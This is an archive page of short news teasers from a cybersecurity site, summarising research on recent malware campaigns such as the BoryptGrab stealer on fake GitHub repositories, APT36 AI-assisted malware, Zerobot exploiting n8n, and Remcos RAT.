Malware Archives - Page 3 of 6

Code on screen representing GitHub malware campaign

BoryptGrab Stealer Spreads Through 100+ Fake GitHub Repositories in Massive Malware Campaign

acint2 months ago03 mins

Trend Micro researchers have uncovered a large-scale malware distribution campaign using over 100 GitHub repositories to spread BoryptGrab, an information stealer that targets browser credentials, cryptocurrency wallets, and sensitive files while deploying reverse SSH backdoors for persistent access. The campaign leverages the trust users place in GitHub to distribute malware disguised as legitimate software tools,…

BoryptGrab Stealer Spreads Through 100+ Malicious GitHub Repositories

acint2 months ago2 months ago02 mins

A massive malware distribution campaign has been discovered leveraging more than 100 GitHub repositories to spread the BoryptGrab information stealer. According to Trend Micro research, the campaign targets Windows users through deceptive downloads masquerading as legitimate software tools and gaming cheats. The Attack Chain The threat actors behind this campaign have deployed an extensive network…

APT36 Vibeware Campaign: Pakistan’s Transparent Tribe Weaponizes AI to Mass-Produce Malware Targeting India

acint2 months ago04 mins

Pakistan-aligned threat actor Transparent Tribe (APT36) has embraced AI-assisted malware development to flood Indian government networks with disposable, polyglot implants—a technique security researchers are calling “vibeware” or Distributed Denial of Detection (DDoD). AI-Powered Malware Industrialization According to Bitdefender’s research, APT36 has shifted from sophisticated, handcrafted implants to high-volume, AI-generated malware written in obscure programming languages…

VOID#GEIST: Multi-Stage Malware Campaign Uses Python Loaders and APC Injection to Deploy XWorm, AsyncRAT, and Xeno RAT

acint2 months ago03 mins

Security researchers at Securonix have uncovered a sophisticated multi-stage malware campaign dubbed VOID#GEIST that delivers three separate remote access trojans (RATs) through an elaborate infection chain designed to evade detection. A Modular Attack Framework Unlike traditional malware that relies on standalone executables, VOID#GEIST employs a modular pipeline comprising batch scripts for orchestration, PowerShell for stealthy…

Zerobot Malware Targets n8n Automation Platform: First Active Exploitation of CVE-2025-68613

acint2 months ago04 mins

Akamai SIRT discovers Zerobot botnet actively exploiting CVE-2025-68613 in n8n workflow automation platform, marking a shift from traditional IoT targeting to enterprise infrastructure.

Malicious Go Crypto Module Steals Passwords and Deploys Rekoobe Backdoor

acint2 months ago02 mins

A sophisticated supply chain attack has been uncovered targeting Go developers through a malicious module that impersonates the legitimate golang.org/x/crypto library. The attack demonstrates how threat actors are increasingly exploiting namespace confusion to compromise developer environments and deploy persistent backdoors. The Attack Mechanism Security researchers at Socket discovered the malicious module github[.]com/xinfeisoft/crypto, which masquerades as…

Fake Google Security Check Transforms Browser Into Surveillance Toolkit via PWA Installation

acint2 months ago13 mins

A sophisticated phishing campaign has been discovered that transforms web browsers into comprehensive surveillance platforms by masquerading as a Google Account security page. According to Malwarebytes researchers, this attack represents one of the most fully-featured browser-based surveillance toolkits observed in the wild. Attack Methodology The attack begins with a convincing replica of a Google Account…

DarkCloud Infostealer Emerges as Major Enterprise Threat: $30 Malware Delivers Scalable Credential Theft

acint3 months ago04 mins

The cybersecurity threat landscape is facing a growing challenge as infostealers continue to dominate the initial access ecosystem in 2026. Among the latest threats drawing serious attention is DarkCloud, a commercially available credential-harvesting malware that proves even low-cost tools can deliver devastating results against enterprise environments. The $30 Threat That Can Compromise Entire Networks DarkCloud…

APT28 Targets European Entities with Operation MacroMaze Webhook Malware Campaign

acint3 months ago02 mins

Russia’s notorious state-sponsored threat actor APT28 (also known as Fancy Bear) has been attributed to a sophisticated new campaign targeting organizations across Western and Central Europe. According to S2 Grupo’s LAB52 threat intelligence team, the campaign—codenamed Operation MacroMaze—was active between September 2025 and January 2026. What makes this campaign notable is its reliance on basic…

Remcos RAT Evolves with Real-Time Webcam Streaming and Live Keylogging Capabilities

acint3 months ago02 mins

A newly observed variant of Remcos RAT has introduced significant upgrades to its surveillance arsenal, marking a dangerous evolution in how this remote access trojan operates on compromised Windows systems. From Storage to Streaming According to Infosecurity Magazine, the updated strain represents a fundamental shift in operational methodology. Rather than relying primarily on storing stolen…